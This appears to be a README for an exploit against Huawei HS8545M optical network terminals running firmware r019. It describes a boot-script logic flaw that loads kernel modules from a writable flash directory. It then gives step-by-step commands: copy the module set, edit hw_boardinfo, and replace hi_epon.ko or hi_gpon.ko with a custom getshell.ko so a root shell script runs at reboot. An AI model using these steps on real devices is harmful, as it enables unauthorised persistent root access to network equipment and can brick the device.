Exploit-HS8545M-ONT
Exploit-HS8545M-ONT copied to clipboard
Exploit Huawei ONT device, only support r019. You need to compile kernel module getshell.ko for r018 or r017 by yourself.
Note
This maybe brick your ONT device, use at your own risk!
Usage
Find an exploit to load userdefined ko module
an exploit in /etc/rc.d/rc.start/1.sdk_init.sh
, use kernel module .ko
to run a shell script /mnt/jffs2/hw/getshell.sh
when system reboot.
Logical exploit in line 200-206
# load hisi modules
if [ -f /mnt/jffs2/TranStar/hi_sysctl.ko ]; then
cd /mnt/jffs2/TranStar/
echo "Loading the Temp HISI SD511X modules: "
else
cd /lib/modules/hisi_sdk
echo "Loading the HISI SD511X modules: "
fi
if /mnt/jffs2/TranStar/hi_sysctl.ko
exsit, then execute cd /mnt/jffs2/TranStar/
. That means work directory is /mnt/jffs2/TranStar/
now, and /mnt/jffs2/TranStar/
is writable.
so
mkdir -p /mnt/jffs2/TranStar/
cp -rf /lib/modules/hisi_sdk/* /mnt/jffs2/TranStar/
In order to excute line 261-262, change in /mnt/jffs2/hw_boardinfo
obj.id = "0x00000001" ; obj.value = "4";
Upload getshell.ko module, compiled by 0neday, only support r019
# just for gpon
cp getshell.ko /mnt/jffs2/TranStar/hi_epon.ko
# or for epon
cp getshell.ko /mnt/jffs2/TranStar/hi_gpon.ko